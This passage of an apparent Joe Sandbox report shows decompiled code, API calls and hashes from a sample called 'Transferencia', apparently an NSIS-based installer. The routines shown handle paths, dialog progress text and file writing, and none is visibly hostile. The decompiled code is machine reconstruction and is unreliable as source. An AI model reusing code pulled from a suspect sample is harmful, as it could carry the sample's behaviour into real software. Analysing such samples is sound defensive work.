                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                                                • Instruction ID: be08228a48e351455db253d3f5410474da148bca98ac48c4339161726040cff4
                                                • Opcode Fuzzy Hash: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                                                • Instruction Fuzzy Hash: 89510A75D00219AADF20EFD5CA88AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004067A1(WCHAR* _a4) {
                                                				short _t5;
                                                				short _t7;
                                                				WCHAR* _t19;
                                                				WCHAR* _t20;
                                                				WCHAR* _t21;
                                                
                                                				_t20 = _a4;
                                                				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                					_t20 =  &(_t20[4]);
                                                				}
                                                				if( *_t20 != 0 && E00405E60(_t20) != 0) {
                                                					_t20 =  &(_t20[2]);
                                                				}
                                                				_t5 =  *_t20;
                                                				_t21 = _t20;
                                                				_t19 = _t20;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((short*)(E00405E16(L"*?|<>/\":", _t5))) == 0) {
                                                							E00405FC5(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                							_t19 = CharNextW(_t19);
                                                						}
                                                						_t20 = CharNextW(_t20);
                                                						_t5 =  *_t20;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t19 =  *_t19 & 0x00000000;
                                                				while(1) {
                                                					_push(_t19);
                                                					_push(_t21);
                                                					_t19 = CharPrevW();
                                                					_t7 =  *_t19;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t19 =  *_t19 & 0x00000000;
                                                					if(_t21 < _t19) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}








                                                0x004067a3
                                                0x004067ac
                                                0x004067c3
                                                0x004067c3
                                                0x004067ca
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067e1
                                                0x004067e3
                                                0x004067ec
                                                0x004067f0
                                                0x0040680d
                                                0x00406815
                                                0x00406815
                                                0x0040681a
                                                0x0040681c
                                                0x0040681f
                                                0x00406824
                                                0x00406825
                                                0x00406829
                                                0x00406829
                                                0x0040682a
                                                0x00406831
                                                0x00406833
                                                0x0040683a
                                                0x00000000
                                                0x00000000
                                                0x00406842
                                                0x00406848
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406848
                                                0x0040684d

                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
                                                • CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
                                                • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
                                                • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-4010320282
                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404E31(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                			}














                                                0x00404e3f
                                                0x00404e4c
                                                0x00404e52
                                                0x00404e90
                                                0x00404e90
                                                0x00404e9f
                                                0x00404ea6
                                                0x00000000
                                                0x00404ea8
                                                0x00404e54
                                                0x00404e63
                                                0x00404e6b
                                                0x00404e6e
                                                0x00404e80
                                                0x00404e86
                                                0x00404e8d
                                                0x00000000
                                                0x00404e8d
                                                0x00000000

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E4C
                                                • GetMessagePos.USER32 ref: 00404E54
                                                • ScreenToClient.USER32 ref: 00404E6E
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E80
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EA6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction ID: da5f2d6a974e9c572a85d9e94ff0a86548add23bfd296e24df18a92b611d7590
                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction Fuzzy Hash: 2F018C71900219BADB00DBA4DD81BFEBBBCAB94710F10002BBB10B61C0C7B4AA018BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                				short _v132;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x7936f8; // 0x3da2f
                                                					_t11 =  *0x79f704; // 0x3e100
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextW(_a4,  &_v132);
                                                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                				}
                                                				return 0;
                                                			}






                                                0x00402fa3
                                                0x00402fb1
                                                0x00402fb7
                                                0x00402fb7
                                                0x00402fc5
                                                0x00402fc7
                                                0x00402fcd
                                                0x00402fd4
                                                0x00402fd6
                                                0x00402fd6
                                                0x00402fec
                                                0x00402ffc
                                                0x0040300e
                                                0x0040300e
                                                0x00403016

                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                • MulDiv.KERNEL32(0003DA2F,00000064,0003E100), ref: 00402FDC
                                                • wsprintfW.USER32 ref: 00402FEC
                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                • SetDlgItemTextW.USER32 ref: 0040300E
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                                                • Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
                                                • Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                                                • Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E732A2655() {
                                                				intOrPtr _t24;
                                                				void* _t26;
                                                				intOrPtr _t27;
                                                				signed int _t39;
                                                				void* _t40;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                				void* _t45;
                                                
                                                				_t40 = E732A12BB();
                                                				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                				do {
                                                					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                					}
                                                					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                					if(_t39 <= 7) {
                                                						switch( *((intOrPtr*)(_t39 * 4 +  &M732A2784))) {
                                                							case 0:
                                                								 *_t40 = 0;
                                                								goto L17;
                                                							case 1:
                                                								__eax =  *__eax;
                                                								if(__ecx > __ebx) {
                                                									 *(__esp + 0x10) = __ecx;
                                                									__ecx =  *(0x732a407c + __edx * 4);
                                                									__edx =  *(__esp + 0x10);
                                                									__ecx = __ecx * __edx;
                                                									asm("sbb edx, edx");
                                                									__edx = __edx & __ecx;
                                                									__eax = __eax &  *(0x732a409c + __edx * 4);
                                                								}
                                                								_push(__eax);
                                                								goto L15;
                                                							case 2:
                                                								__eax = E732A1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                								goto L16;
                                                							case 3:
                                                								__ecx =  *0x732a506c;
                                                								__edx = __ecx - 1;
                                                								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                								__eax =  *0x732a506c;
                                                								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                								goto L17;
                                                							case 4:
                                                								__eax = lstrcpynW(__edi,  *__eax,  *0x732a506c);
                                                								goto L17;
                                                							case 5:
                                                								_push( *0x732a506c);
                                                								_push(__edi);
                                                								_push( *__eax);
                                                								__imp__StringFromGUID2();
                                                								goto L17;
                                                							case 6:
                                                								_push( *__esi);
                                                								L15:
                                                								__eax = wsprintfW(__edi, 0x732a5000);
                                                								L16:
                                                								__esp = __esp + 0xc;
                                                								goto L17;
                                                						}
                                                					}
                                                					L17:
                                                					_t26 =  *(_t43 + 0x14);
                                                					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                						GlobalFree(_t26);
                                                					}
                                                					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                					if(_t27 != 0) {
                                                						if(_t27 != 0xffffffff) {
                                                							if(_t27 > 0) {
                                                								E732A1381(_t27 - 1, _t40);
                                                								goto L26;
                                                							}
                                                						} else {
                                                							E732A1312(_t40);
                                                							L26:
                                                						}
                                                					}
                                                					_t44 = _t44 - 1;
                                                					_t43 = _t43 - 0x20;
                                                				} while (_t44 >= 0);
                                                				return GlobalFree(_t40);
                                                			}











                                                0x732a265f
                                                0x732a2661
                                                0x732a2665
                                                0x732a2674
                                                0x732a2678
                                                0x732a267d
                                                0x732a267d
                                                0x732a2685
                                                0x732a268c
                                                0x732a2692
                                                0x00000000
                                                0x732a2699
                                                0x00000000
                                                0x00000000
                                                0x732a26a1
                                                0x732a26a5
                                                0x732a26a8
                                                0x732a26ac
                                                0x732a26b3
                                                0x732a26b7
                                                0x732a26bd
                                                0x732a26bf
                                                0x732a26c1
                                                0x732a26c1
                                                0x732a26c8
                                                0x00000000
                                                0x00000000
                                                0x732a26d1
                                                0x00000000
                                                0x00000000
                                                0x732a26d8
                                                0x732a26de
                                                0x732a26e8
                                                0x732a26ee
                                                0x732a26f3
                                                0x00000000
                                                0x00000000
                                                0x732a2714
                                                0x00000000
                                                0x00000000
                                                0x732a26fa
                                                0x732a2700
                                                0x732a2701
                                                0x732a2703
                                                0x00000000
                                                0x00000000
                                                0x732a271c
                                                0x732a271e
                                                0x732a2724
                                                0x732a272a
                                                0x732a272a
                                                0x00000000
                                                0x00000000
                                                0x732a2692
                                                0x732a272d
                                                0x732a272d
                                                0x732a2732
                                                0x732a2743
                                                0x732a2743
                                                0x732a2749
                                                0x732a274e
                                                0x732a2753
                                                0x732a275f
                                                0x732a2764
                                                0x00000000
                                                0x732a2769
                                                0x732a2755
                                                0x732a2756
                                                0x732a276a
                                                0x732a276a
                                                0x732a2753
                                                0x732a276b
                                                0x732a276c
                                                0x732a276f
                                                0x732a2783

                                                APIs
                                                  • Part of subcall function 732A12BB: GlobalAlloc.KERNELBASE(00000040,?,732A12DB,?,732A137F,00000019,732A11CA,-000000A0), ref: 732A12C5
                                                • GlobalFree.KERNEL32 ref: 732A2743
                                                • GlobalFree.KERNEL32 ref: 732A2778
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: c47758b99de272a6a7ad1900b8cbd731f58b7046005690be48cc569210ce6703
                                                • Instruction ID: 59602891232afbfe880e5d71695c9e42c3869f0cbbf6bc67d49cc9cf467cb167
                                                • Opcode Fuzzy Hash: c47758b99de272a6a7ad1900b8cbd731f58b7046005690be48cc569210ce6703
                                                • Instruction Fuzzy Hash: B731067260431ADFD71A9F59CD88F2A77BAFB853013248128FD45A3250C774A984FB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00402950(int __ebx, void* __eflags) {
                                                				WCHAR* _t26;
                                                				void* _t29;
                                                				long _t37;
                                                				int _t49;
                                                				void* _t52;
                                                				void* _t54;
                                                				void* _t56;
                                                				void* _t59;
                                                				void* _t60;
                                                				void* _t61;
                                                
                                                				_t49 = __ebx;
                                                				_t52 = 0xfffffd66;
                                                				_t26 = E00402DA6(0xfffffff0);
                                                				_t55 = _t26;
                                                				 *(_t61 - 0x40) = _t26;
                                                				if(E00405E60(_t26) == 0) {
                                                					E00402DA6(0xffffffed);
                                                				}
                                                				E00405FE5(_t55);
                                                				_t29 = E0040600A(_t55, 0x40000000, 2);
                                                				 *(_t61 + 8) = _t29;
                                                				if(_t29 != 0xffffffff) {
                                                					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                					if( *(_t61 - 0x28) != _t49) {
                                                						_t37 =  *0x7a8a74;
                                                						 *(_t61 - 0x44) = _t37;
                                                						_t54 = GlobalAlloc(0x40, _t37);
                                                						if(_t54 != _t49) {
                                                							E004034C2(_t49);
                                                							E004034AC(_t54,  *(_t61 - 0x44));
                                                							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                							 *(_t61 - 0x10) = _t59;
                                                							if(_t59 != _t49) {
                                                								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                								while( *_t59 != _t49) {
                                                									_t60 = _t59 + 8;
                                                									 *(_t61 - 0x3c) =  *_t59;
                                                									E00405FC5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                									_t59 = _t60 +  *(_t61 - 0x3c);
                                                								}
                                                								GlobalFree( *(_t61 - 0x10));
                                                							}
                                                							E004060BC( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                							GlobalFree(_t54);
                                                							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                						}
                                                					}
                                                					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                					CloseHandle( *(_t61 + 8));
                                                				}
                                                				_t56 = 0xfffffff3;
                                                				if(_t52 < _t49) {
                                                					_t56 = 0xffffffef;
                                                					DeleteFileW( *(_t61 - 0x40));
                                                					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                				}
                                                				_push(_t56);
                                                				E00401423();
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t61 - 4));
                                                				return 0;
                                                			}













                                                0x00402950
                                                0x00402952
                                                0x00402957
                                                0x0040295c
                                                0x0040295f
                                                0x00402969
                                                0x0040296d
                                                0x0040296d
                                                0x00402973
                                                0x00402980
                                                0x00402988
                                                0x0040298b
                                                0x00402997
                                                0x0040299a
                                                0x004029a0
                                                0x004029ae
                                                0x004029b3
                                                0x004029b7
                                                0x004029ba
                                                0x004029c3
                                                0x004029cf
                                                0x004029d3
                                                0x004029d6
                                                0x004029e0
                                                0x004029ff
                                                0x004029ec
                                                0x004029f4
                                                0x004029f7
                                                0x004029fc
                                                0x004029fc
                                                0x00402a06
                                                0x00402a06
                                                0x00402a13
                                                0x00402a19
                                                0x00402a1f
                                                0x00402a1f
                                                0x004029b7
                                                0x00402a33
                                                0x00402a35
                                                0x00402a35
                                                0x00402a3f
                                                0x00402a40
                                                0x00402a44
                                                0x00402a48
                                                0x00402a4e
                                                0x00402a4e
                                                0x00402a55
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                • GlobalFree.KERNEL32 ref: 00402A06
                                                • GlobalFree.KERNEL32 ref: 00402A19
                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: aebb5c15b31ebc5aa49e3490bdf2bd0c4f89cf94e3d7c186155ff6a3853049af
                                                • Instruction ID: ce13e03cd45963b48540e15e7c975c75beca6294bacda27d7b2280c3fc44a057
                                                • Opcode Fuzzy Hash: aebb5c15b31ebc5aa49e3490bdf2bd0c4f89cf94e3d7c186155ff6a3853049af
                                                • Instruction Fuzzy Hash: CA31B171D00124BBCF216FA5CE89D9EBE79EF49364F14423AF450762E1CB794C429B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E732A1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				char _v76;
                                                				void _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				signed int _t60;
                                                				signed int _t61;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t69;
                                                				void* _t70;
                                                				void* _t71;
                                                				signed int _t77;
                                                				void* _t81;
                                                				signed int _t83;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t101;
                                                
                                                				_t85 = __edx;
                                                				 *0x732a506c = _a8;
                                                				_t77 = 0;
                                                				 *0x732a5070 = _a16;
                                                				_v12 = 0;
                                                				_v8 = E732A12E3();
                                                				_t90 = E732A13B1(_t42);
                                                				_t87 = _t85;
                                                				_t81 = E732A12E3();
                                                				_a8 = _t81;
                                                				_t45 =  *_t81;
                                                				if(_t45 != 0x7e && _t45 != 0x21) {
                                                					_a16 = E732A12E3();
                                                					_t77 = E732A13B1(_t74);
                                                					_v12 = _t85;
                                                					GlobalFree(_a16);
                                                					_t81 = _a8;
                                                				}
                                                				_t46 =  *_t81 & 0x0000ffff;
                                                				_t101 = _t46 - 0x2f;
                                                				if(_t101 > 0) {
                                                					_t47 = _t46 - 0x3c;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                                						if( *((short*)(_t81 + 2)) != 0x3c) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags > 0) {
                                                								L56:
                                                								_t48 = 0;
                                                								__eflags = 0;
                                                								L57:
                                                								asm("cdq");
                                                								L58:
                                                								_t90 = _t48;
                                                								_t87 = _t85;
                                                								L59:
                                                								E732A1510(_t85, _t90, _t87,  &_v76);
                                                								E732A1312( &_v76);
                                                								GlobalFree(_v8);
                                                								return GlobalFree(_a8);
                                                							}
                                                							if(__eflags < 0) {
                                                								L49:
                                                								__eflags = 0;
                                                								L50:
                                                								_t48 = 1;
                                                								goto L57;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 < _t77) {
                                                								goto L49;
                                                							}
                                                							goto L56;
                                                						}
                                                						_t85 = _t87;
                                                						_t48 = E732A3050(_t90, _t77, _t85);
                                                						goto L58;
                                                					}
                                                					_t57 = _t47 - 1;
                                                					__eflags = _t57;
                                                					if(_t57 == 0) {
                                                						__eflags = _t90 - _t77;
                                                						if(_t90 != _t77) {
                                                							goto L56;
                                                						}
                                                						__eflags = _t87 - _v12;
                                                						if(_t87 != _v12) {
                                                							goto L56;
                                                						}
                                                						goto L49;
                                                					}
                                                					_t58 = _t57 - 1;
                                                					__eflags = _t58;
                                                					if(_t58 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                                						if( *((short*)(_t81 + 2)) != 0x3e) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags < 0) {
                                                								goto L56;
                                                							}
                                                							if(__eflags > 0) {
                                                								goto L49;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 <= _t77) {
                                                								goto L56;
                                                							}
                                                							goto L49;
                                                						}
